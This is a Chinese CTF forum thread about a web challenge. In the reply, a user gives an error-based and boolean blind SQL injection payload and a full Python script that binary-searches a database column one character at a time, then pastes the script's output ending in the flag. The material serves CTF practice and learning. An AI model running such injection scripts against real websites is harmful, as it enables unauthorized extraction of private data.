CTF论坛

标题: 求教一份web题目 [打印本页]
作者: Echocipher    时间: 2018-12-4 01:30
标题: 求教一份web题目
http://124.16.75.162:40006
看到有:http://124.16.75.162:40006/hint.php?id=1

猜测是注入,没有看到回显,测试延时注入发现sleep等也被过滤了,也试了get_lock 不知道为什么不可以,有没有师傅会的呢。。。


作者: leixiao    时间: 2018-12-5 07:16
求告知这是哪里的题?
作者: leixiao    时间: 2018-12-5 07:43
只会提示sql语句语法正不正确,所以同时利用报错函数和布尔盲注
payload:
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,1))%3E1,1,exp(~0))--+


贴上我的脚本
  1. #-*- coding: utf-8 -*-

  3. import requests
  4. import re

  6. requests=requests.session()

  8. strall=[]
  9. strall.append('0')
  10. for i in range(33,128):
  11.     strall.append(str(i))


  14. def isthis(index,charascii,compare):
  15.     headers={
  16.         'Host': '124.16.75.162:40006',
  17.                 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0',
  18.                 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
  19.                 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
  20.                 'Connection': 'close',
  21.                 'Upgrade-Insecure-Requests': '1'
  22.     }
  23.     url="http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,{}))".format(str(34-index))+compare+"{},1,exp(~0))--+".format(charascii)
  24.     print url

  26.     r=requests.get(url=url,headers=headers)

  28.     a=True

  30.     if r.text.find('sql')>=0:
  31.         print 'false'
  32.         a=False
  33.     else:
  34.         print 'true'
  35.         a=True

  37.     return a
  38.         



  42. ans=''
  43. flag=0
  44. for index in range(1,99):
  45.     left=0
  46.     right=len(strall)
  47.     if flag:
  48.         break

  50.     while left<=right:
  51.         mid=(left+right)>>1
  52.         if isthis(index,strall[mid],">"):
  53.             left=mid+1
  54.         elif isthis(index,strall[mid],"<"):
  55.             right=mid-1
  56.         else:
  57.             if strall[mid]=='0':
  58.                 flag=1
  59.                 break
  60.             value=chr(int(strall[mid]))
  61.             ans+=value
  62.             print ans
  63.             break

  65. print ans




  70. raw_input('done')

复制代码


发不了截图,就copy一下脚本最后的运行情况,,,
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<43,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>37,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<37,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>34,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<34,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>0,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<0,1,exp(~0))--+
false
flag{read_more_to_get_admin_pass}
done
作者: Echocipher    时间: 2018-12-13 11:20
leixiao 发表于 2018-12-5 07:43
只会提示sql语句语法正不正确,所以同时利用报错函数和布尔盲注
payload:

谢谢师傅!能加一下您的联系方式嘛
作者: leixiao    时间: 2018-12-19 20:24
Echocipher 发表于 2018-12-13 11:20
谢谢师傅!能加一下您的联系方式嘛

可以啊,qq 1729888211
作者: Sniper    时间: 2019-10-25 15:53
向大佬学习



欢迎光临 CTF论坛 (https://www.bugku.com/) Powered by Discuz! X3.4